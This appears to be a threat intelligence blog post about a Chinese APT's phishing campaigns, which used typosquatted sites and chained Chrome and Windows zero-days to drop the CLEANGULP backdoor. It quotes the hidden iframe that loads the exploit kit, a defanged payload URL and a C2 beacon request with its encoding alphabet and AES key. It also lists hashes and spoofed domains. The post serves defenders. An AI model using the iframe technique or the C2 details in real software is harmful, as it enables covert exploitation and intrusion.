Threat Intelligence
September 21, 2026
On September 9, 2026, Volexity published a blog post detailing the simultaneous use of multiple chained zero-day exploits in Google Chrome (CVE-2026-85046, CVE-2026-87491) and Microsoft Windows (CVE-2026-85880) by two different Chinese advanced persistent threat (APT) actors.
Shortly after that blog post was published, Volexity discovered additional campaigns—this time from a third Chinese threat actor, tracked by Volexity under the alias UTA0565—that used the same chained exploits on September 3-4, 2026, while the vulnerabilities were still unpatched. Notably, this threat actor’s campaigns differed from previously documented attacks by using multiple fake websites to deceive victims.
In one observed campaign, a phishing email sent was to Asian government entities:

This Chinese-language phishing email urges readers to publicly support imprisoned Hong Kong activist Chow Hang-tung and amplify her voice against Chinese Communist Party suppression of a June 4th commemoration.
In another campaign, the threat actor sent a phishing email masquerading as the Center for American Progress:

Each phishing email included a link to a spoofed domain registered and controlled by the threat actor:
| Legitimate Domain | Spoofed Domain |
| chinadigitaltimes.net | chinadigitaltimes[.]top |
| americanprogress.org | americanprgoress[.]top |
At the time of analysis, the fake website spoofing the China Digital Times was no longer available. However, searches within Censys showed the hosting IP address (96.9.125[.]52) had served a website designed to look identical to the legitimate China Digital Times website.
The spoofed site americanprgoress[.]top appears to be a typosquat impersonating the Center for American Progress, which was still live at the time of analysis. It loaded most of its content from the legitimate website, but it also loaded an additional HTML element via an iframe:
<iframe src="/config.html" style="display:none;visibility:hidden;width:0;height:0;border:0;overflow:hidden" tabindex="-1" aria-hidden="true" title="site-config"></iframe>
This HTML element consists of the same components used in previously analyzed exploitation of Chrome (CVE-2026-85046, CVE-2026-87491) and Windows local privilege escalation exploits (CVE-2026-85880). The implementation is largely unchanged:
The main functional difference is the replacement pp payload. In this version, config.html is designed to do the following:
There are also various changes that do not affect the exploit kit’s operation, such as renamed variables, debug messages, and comments, as well as an option to log data to an internal IP address.
The chain downloaded its final payload from the following URL:
hxxps://americanprgoress[.]top/chrome_cleanup.exe
The table below details this payload:
| Name | chrome_cleanup.exe |
| Size | 893.0KB (914432 Bytes) |
| File Type | Win64 EXE |
| MD5 | 177652713dad3c128bd9195abf2b7603 |
| SHA1 | 668aa5551315ab26b67118fbb29f8e4560a1e1af |
| SHA256 | 8858ea412dc306b3558885af18006c5ca24689e8875733b5e13b3c2692e603cb |
This payload belongs to a previously undocumented malware family that Volexity tracks as CLEANGULP. The malware was originally written in C and built using the Microsoft Visual C Compiler, then heavily obfuscated using control flow flattening and indirect calls to hinder analysis. Volexity analyzed CLEANGULP primarily through dynamic analysis, locating and emulating string de-obfuscation functions. Based on this partial analysis, Volexity assesses with high confidence that CLEANGULP supports the following capabilities:
| Command | Description |
| shell | Run a command |
| ps | List running processes |
| upload | Upload a file |
| download | Download a file |
| bof | Execution of a beacon object file |
This instance of CLEANGULP uses a single hardcoded command-and-control (C2) domain thecovnresation[.]com. The domain appears to be a typosquat impersonating The Conversation (theconversation[.]com), a non-profit network of media organizations that publishes news articles. All network traffic observed by Volexity usedHTTP as its communication method. After initialization, the malware performs an initial beacon to register with the C2. An example request is showb below:
POST /beacon/pre-register HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Host: thecovnresation[.]com
Content-Length: 100
Cache-Control: no-cache
9cjjWgOSWXy+T9JxH834SndiMhIcR56jll4D0WNV8KPh5nExMLCRLRuj3iEIQcy+ZeASbLUvpzy/7/cZuCPwBcKLiciy+dfcTTz5
The body of the request and response are AES-256-GCM encrypted, then Base64 encoded using the following custom alphabet:
3GHIJKLMNOPQRSTUb4Fcd0fghijklmnopq/rstuvwxyzABCDEWXYZ12V56789a+e
The AES key used is the SHA256 of the custom alphabet string, as follows:
cbeeb7dd5e89261cde032825fd10bb80bad2e3fbf5b91fdc9137ad463ffa8f21
When decrypted, the registration request and response bodies look like the examples below:
The registration UUID value does not conform to RFC 9562. It is a time-based session identifier that is calculated once on malware initialization.
Volexity pivoted on the registration pattern of the domains in these attacks, uncovering several additional domains that Volexity assesses with medium confidence were also used by UTA0565 in similar campaigns. These domains span spoofed media organizations, halal restaurant search websites, and corporate training organizations, potentially offering additional insight into UTA0565’s targeting.
| Legitimate Domain | Spoofed Domain | Registration Date |
| N/A | personclouds[.]com | 2026-09-03 |
| outsourcingwise[.]com | outsourcingwise[.]net | 2026-09-02 |
| halal-navi[.]com | halal-navi[.]net | 2026-09-02 |
| halalketak[.]net | halaltak[.]net | 2026-09-02 |
| theconversation[.]com | thecovnresation[.]net | 2026-09-04 |
| theconversation[.]com | thecovnresation[.]com | 2026-09-04 |
| borneobulletin.com[.]bn | borneobulletins[.]top | 2026-09-03 |
These spoofed domains are all believed to be attacker-controlled, used to either host malware and exploits or as a post-infection C2 channel.
Subsequent analysis by Volexity identified another campaign using the same exploit kit as the previously reported threat actors, and Proofpoint has also identified several other disparate users of the kit. This seemingly widespread adoption across multiple threat actors suggests a coordinated effort within the Chinese CNE community, where the core kit was likely shared, customized, and weaponized by multiple groups. The activity reported so far reflects only two organizations’ observations; the full scope and impact are likely far broader.
Notably, UTA0565’s use of the zero-day vulnerabilities shows technical and operational improvements over other campaigns observed by Volexity, both in the mechanics of the exploitation and the presentation to end users. Using real content from legitimate websites as decoy material continues to be an effective way to reduce user suspicion.
Indicators associated with this campaign can be found here.
Volexity would like to thank its customers for their close collaboration and for permitting public sharing of the investigation details.
If any organization or individual believes they may have been targeted by a similar attack, please reach out to Volexity via our contact form. We would be glad to assess any potential targeting and assist in determining if such an attack may have succeeded.
Volexity’s Threat Intelligence research, such as the content from this blog, is published to customers via its Threat Intelligence Service. The activity described in this blog post was shared with Volexity Threat Intelligence customers in TIB-20260911. Related indicators were available to customers beginning on September 9, 2026.
If you are interested in learning more about Volexity’s services, including Threat Intelligence, Network Security Monitoring and Incident Response, or our leading memory forensics solutions, Volexity Surge Collect Pro for memory acquisition and Volexity Volcano for memory analysis, please do not hesitate to contact us.